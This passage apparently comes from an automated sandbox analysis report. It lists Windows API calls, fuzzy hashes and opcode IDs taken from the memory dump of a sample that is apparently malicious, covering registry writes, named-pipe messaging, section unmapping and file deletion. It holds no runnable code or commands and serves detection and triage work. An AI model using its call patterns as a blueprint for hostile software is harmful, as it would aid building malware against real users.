    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
